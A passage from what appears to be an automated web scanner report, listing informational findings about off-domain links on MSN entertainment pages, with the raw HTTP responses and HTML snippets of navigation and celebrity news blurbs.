Set-Cookie: MUID=24C3266C14EC40D9B42A1F40D09CEE72; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345084&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FJesse-James-ex-arrested.aspx%3Fcp-documentid%3D27467016&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&go=&form=msnpop"><strong>
...[SNIP]...
<div>Police arrested Janine Lindemulder in Texas <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&go=&form=msnpop">for harassing</a> her ex-husband, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james&form=msnpop">Jesse James</a>... Lindemulder had multiple warrants out for her arrest (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=janine+lindemulder+warrants&form=msnpop">how many?</a>
...[SNIP]...
<div>Lindemulder is currently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=lindemulder+three+warrants+jail&form=msnpop">behind bars</a>
...[SNIP]...
<div>Jesse James recently announced his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james+engaged&form=msnpop">plans to marry again</a>
...[SNIP]...
<div>See pics of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=kat+von+d&qpvt=kat+von+d&FORM=msnpop">the woman</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.309. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx?cp-documentid=27467016

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=kat+von+d&qpvt=kat+von+d&FORM=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=janine+lindemulder+warrants&form=msnpop
http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&go=&form=msnpop
http://www.bing.com/search?q=jesse+james&form=msnpop
http://www.bing.com/search?q=jesse+james+engaged&form=msnpop
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=lindemulder+three+warrants+jail&form=msnpop
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406702&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FJesse-James-ex-arrested.aspx%3Fcp-documentid%3D27467016&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=49cf7ff8fca2449da769326f63d05416; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7945FEEB4E084CD1BE4E201A0D14327D; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406702&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FJesse-James-ex-arrested.aspx%3Fcp-documentid%3D27467016&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&go=&form=msnpop"><strong>
...[SNIP]...
<div>Police arrested Janine Lindemulder in Texas <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james%27+ex+wife+arrest&go=&form=msnpop">for harassing</a> her ex-husband, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james&form=msnpop">Jesse James</a>... Lindemulder had multiple warrants out for her arrest (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=janine+lindemulder+warrants&form=msnpop">how many?</a>
...[SNIP]...
<div>Lindemulder is currently <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=lindemulder+three+warrants+jail&form=msnpop">behind bars</a>
...[SNIP]...
<div>Jesse James recently announced his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=jesse+james+engaged&form=msnpop">plans to marry again</a>
...[SNIP]...
<div>See pics of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=kat+von+d&qpvt=kat+von+d&FORM=msnpop">the woman</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.310. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=taraji+p+henson&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=%22The+Curious+Case+of+Benjamin+Buttons%22&form=msnpop
http://www.bing.com/search?q=Cate+Blanchett&form=msnpop
http://www.bing.com/search?q=PETA%92s+newest+naked+celeb&go=&form=msnpop
http://www.bing.com/search?q=PETA&form=msnpop
http://www.bing.com/search?q=PETA+celebrity+ads&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=taraji+p+henson&FORM=msnpop
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/the-curious-case-of-benjamin-button-clip-like-everyone-else/5g9i2t4?q=%22The+Curious+Case+of+Benjamin+Button%22&form=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406696&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FPETAs-newest-naked-celeb.aspx%3Fcp-documentid%3D27450762&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:16 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a2c3e0298bf742cabd5f6e31537aa55a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=35384FB4CE3F41048B6FDBC4BF0BEC4A; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:16 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406696&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FPETAs-newest-naked-celeb.aspx%3Fcp-documentid%3D27450762&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA%92s+newest+naked+celeb&go=&form=msnpop"><strong>
...[SNIP]...
<div>Oscar-nominated actress <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taraji+p+henson&FORM=msnpop">Taraji P. Henson</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=taraji+p+henson&form=msnpop">see photos</a>) has become the latest celebrity to strip for People for the Ethical Treatment of Animals (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA&form=msnpop">PETA</a>
...[SNIP]...
<div>Henson was nominated for an Academy Award for <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=%22The+Curious+Case+of+Benjamin+Buttons%22&form=msnpop">a movie</a>, which also starred Brad Pitt and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cate+Blanchett&form=msnpop">Cate Blanchett</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/the-curious-case-of-benjamin-button-clip-like-everyone-else/5g9i2t4?q=%22The+Curious+Case+of+Benjamin+Button%22&form=msnpop">Watch</a>
...[SNIP]...
<div>Find other <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA+celebrity+ads&form=msnpop">PETA celebrity ads</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.311. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=taraji+p+henson&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=%22The+Curious+Case+of+Benjamin+Buttons%22&form=msnpop
http://www.bing.com/search?q=Cate+Blanchett&form=msnpop
http://www.bing.com/search?q=PETA%92s+newest+naked+celeb&go=&form=msnpop
http://www.bing.com/search?q=PETA&form=msnpop
http://www.bing.com/search?q=PETA+celebrity+ads&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=taraji+p+henson&FORM=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/the-curious-case-of-benjamin-button-clip-like-everyone-else/5g9i2t4?q=%22The+Curious+Case+of+Benjamin+Button%22&form=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345077&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FPETAs-newest-naked-celeb.aspx%3Fcp-documentid%3D27450762&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=30c8de379ad14a979ac5931adc8cb918; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=57D504B387C74D618E739D5E9187758C; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345077&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FPETAs-newest-naked-celeb.aspx%3Fcp-documentid%3D27450762&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA%92s+newest+naked+celeb&go=&form=msnpop"><strong>
...[SNIP]...
<div>Oscar-nominated actress <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taraji+p+henson&FORM=msnpop">Taraji P. Henson</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=taraji+p+henson&form=msnpop">see photos</a>) has become the latest celebrity to strip for People for the Ethical Treatment of Animals (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA&form=msnpop">PETA</a>
...[SNIP]...
<div>Henson was nominated for an Academy Award for <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=%22The+Curious+Case+of+Benjamin+Buttons%22&form=msnpop">a movie</a>, which also starred Brad Pitt and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cate+Blanchett&form=msnpop">Cate Blanchett</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/the-curious-case-of-benjamin-button-clip-like-everyone-else/5g9i2t4?q=%22The+Curious+Case+of+Benjamin+Button%22&form=msnpop">Watch</a>
...[SNIP]...
<div>Find other <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=PETA+celebrity+ads&form=msnpop">PETA celebrity ads</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
